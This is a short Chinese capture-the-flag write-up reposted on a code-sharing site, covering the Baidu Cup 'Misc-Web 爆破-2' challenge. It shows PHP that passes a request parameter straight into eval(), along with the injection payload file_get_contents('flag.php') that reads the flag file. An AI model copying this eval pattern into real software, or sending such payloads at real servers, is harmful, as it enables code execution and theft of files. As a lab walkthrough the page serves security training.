码迷,mamicode.com
首页 > Web开发 > 详细

[百度杯-二月场](Misc-Web)爆破-2

时间:2018-06-23 19:07:43      阅读:198      评论:0      收藏:0      [点我收藏+]

标签:__file__   info   inf   .com   nts   dump   TE   百度   分享   

<?php
include "flag.php";
$a = @$_REQUEST[‘hello‘];
eval( "var_dump($a);");
show_source(__FILE__);

 

文件包含 我们可以考虑让他输出flag.php

构造 hello=file_get_contents(‘flag.php‘)

技术分享图片

 

[百度杯-二月场](Misc-Web)爆破-2

标签:__file__   info   inf   .com   nts   dump   TE   百度   分享   

原文地址:https://www.cnblogs.com/alyx/p/9217539.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!